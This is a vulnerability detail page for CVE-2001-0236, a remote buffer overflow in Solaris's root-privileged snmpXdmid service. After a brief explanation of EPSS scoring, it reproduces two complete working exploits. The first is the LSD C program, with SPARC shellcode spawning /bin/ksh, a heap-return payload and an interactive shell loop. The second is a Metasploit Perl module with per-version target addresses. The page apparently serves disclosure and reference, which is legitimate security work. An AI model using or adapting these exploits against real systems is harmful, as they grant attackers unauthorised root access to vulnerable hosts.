CVE-2001-0236 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/2417/info Versions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa. SnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap. SnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately. /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/ /*## snmpXdmid #*/ /* as the final jump to the assembly code is made to the heap area, this code */ /* also works against machines with non-exec stack protection turned on */ /* due to large data transfers of about 128KB, the code may need some time to */ /* proceed, so be patient */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define SNMPXDMID_PROG 100249 #define SNMPXDMID_VERS 0x1 #define SNMPXDMID_ADDCOMPONENT 0x101 char findsckcode[]= "\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */ "\x20\xbf\xff\xff" /* bn,a <findsckcode> */ "\x7f\xff\xff\xff" /* call <findsckcode+4> */ "\x33\x02\x12\x34" "\xa0\x10\x20\xff" /* mov 0xff,%l0 */ "\xa2\x10\x20\x54" /* mov 0x54,%l1 */ "\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */ "\xaa\x03\xe0\x28" /* add %o7,40,%l5 */ "\x81\xc5\x60\x08" /* jmp %l5+8 */ "\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */ "\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */ "\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */ "\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */ "\x02\xbf\xff\xfb" /* bz <findsckcode+32> */ "\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */ "\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */ "\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */ "\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */ "\x90\x04\x20\x01" /* add %l0,1,%o0 */ "\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */ "\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */ "\x94\x03\xff\xc4" /* add %o7,-60,%o2 */ "\x82\x10\x20\x36" /* mov 0x36,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "\x1a\xbf\xff\xf1" /* bcc <findsckcode+36> */ "\xa0\xa4\x20\x01" /* deccc %l0 */ "\x12\xbf\xff\xf5" /* bne <findsckcode+60> */ "\xa6\x10\x20\x03" /* mov 0x03,%l3 */ "\x90\x04\x20\x02" /* add %l0,2,%o0 */ "\x92\x10\x20\x09" /* mov 0x09,%o1 */ "\x94\x04\xff\xff" /* add %l3,-1,%o2 */ "\x82\x10\x20\x3e" /* mov 0x3e,%g1 */ "\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */ "\x12\xbf\xff\xfb" /* bne <findsckcode+112> */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; static char nop[]="\x80\x1c\x40\x11"; typedef struct{ struct{unsigned int len;char *val;}name; struct{unsigned int len;char *val;}pragma; }req_t; bool_t xdr_req(XDR *xdrs,req_t *objp){ char *v=NULL;unsigned long l=0;int b=1; if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); return(TRUE); } main(int argc,char **argv){ char buffer[140000],address[4],pch[4],*b; int i,c,n,vers=-1,port=0,sck; CLIENT *cl;enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; struct timeval tm={10,0}; req_t req; printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\n"); printf("snmpXdmid for solaris 2.7 2.8 sparc\n\n"); if(argc<2){ printf("usage: %s address [-p port] -v 7|8\n",argv[0]); exit(-1); } while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){ switch(c){ case 'p': port=atoi(optarg);break; case 'v': vers=atoi(optarg); } } switch(vers){ case 7: *(unsigned int*)address=0x000b1868;break; case 8: *(unsigned int*)address=0x000cf2c0;break; default: exit(-1); } *(unsigned long*)pch=htonl(*(unsigned int*)address+32000); *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000); printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec); fflush(stdout); adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(-1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck=RPC_ANYSOCK; if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){ clnt_pcreateerror("error");exit(-1); } cl->cl_auth=authunix_create("localhost",0,0,0,NULL); i=sizeof(struct sockaddr_in); if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){ struct{unsigned int maxlen;unsigned int len;char *buf;}nb; ioctl(sck,(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck,(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); printf("port=%d connected! ",n);fflush(stdout); findsckcode[12+2]=(unsigned char)((n&0xff00)>>8); findsckcode[12+3]=(unsigned char)(n&0xff); b=&buffer[0]; for(i=0;i<1248;i++) *b++=pch[i%4]; for(i=0;i<352;i++) *b++=address[i%4]; *b=0; b=&buffer[10000]; for(i=0;i<64000;i++) *b++=0; for(i=0;i<64000-188;i++) *b++=nop[i%4]; for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; *b=0; req.name.len=1200+400+4; req.name.val=&buffer[0]; req.pragma.len=128000+4; req.pragma.val=&buffer[10000]; stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm); if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);} printf("sent!\n"); write(sck,"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck,buf,cnt); } if(FD_ISSET(sck,&fds)){ if((cnt=read(sck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } }

source: https://www.securityfocus.com/bid/2417/info Versions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa. SnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap. SnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately. ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::solaris_snmpxdmid; use base "Msf::Exploit"; use strict; use Pex::Text; use Pex::SunRPC; use Pex::XDR; my $advanced = { }; my $info = { 'Name' => 'Solaris snmpXdmid AddComponent Overflow', 'Version' => '$Revision: 1.6 $', 'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ], 'Arch' => [ 'sparc' ], 'OS' => [ 'solaris' ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target RPC port', 111], }, 'Payload' => { 'Space' => 64000, 'MinNops' => 63000, }, 'Description' => Pex::Text::Freeform(qq{ Exploit based on LSD's solsparc_snmpxdmid.c. Exploit a simple overflow and return to the heap avoiding NX stacks. }), 'Refs' => [ ['BID', 2417], ['URL', 'http://lsd-pl.net/code/SOLARIS/solsparc_snmpxdmid.c'], ], 'Targets' => [ [ 'Solaris 7 / SPARC', 0xb1868 + 96000, 0xb1868 + 32000 ], [ 'Solaris 8 / SPARC', 0xcf2c0 + 96000, 0xcf2c0 + 32000 ], ], 'Keys' => ['snmpxdmid'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my %data; my $host = $self->GetVar('RHOST'); my $port = $self->GetVar('RPORT'); if(Pex::SunRPC::Clnt_create(\%data, $host, $port, 100249, 1, "tcp", "tcp") == -1) { $self->PrintLine("[*] RPC request failed (snmpXdmid)."); return; } $self->PrintLine("[*] Using port $data{'rport'}"); Pex::SunRPC::Authunix_create(\%data, "localhost", 0, 0, []); $self->PrintLine("[*] Generating buffer..."); my $array1 = (pack("N", ($target->[2])) x (1248/4)). (pack("N", ($target->[1])) x (352/4)). (pack("N", 0)); my $array2 = (pack("N", 0) x (64000/4)). ($shellcode). (pack("N", 0)); my @array1_tbl = map { unpack("C", $_) } split(//, $array1); my @array2_tbl = map { unpack("C", $_) } split(//, $array2); my $buf = Pex::XDR::Encode_int(0). Pex::XDR::Encode_int(0). Pex::XDR::Encode_bool(1). Pex::XDR::Encode_int(0). Pex::XDR::Encode_bool(1). Pex::XDR::Encode_varray([@array1_tbl], \&Pex::XDR::Encode_lchar). Pex::XDR::Encode_bool(1). Pex::XDR::Encode_varray([@array2_tbl], \&Pex::XDR::Encode_lchar). Pex::XDR::Encode_int(0). Pex::XDR::Encode_int(0); $self->PrintLine("[*] Sending payload..."); if(Pex::SunRPC::Clnt_call(\%data, 0x101, $buf) == -1) { $self->PrintLine("[*] snmpXdmid addcomponent request failed."); return; } $self->PrintLine("[*] Sent!"); return; }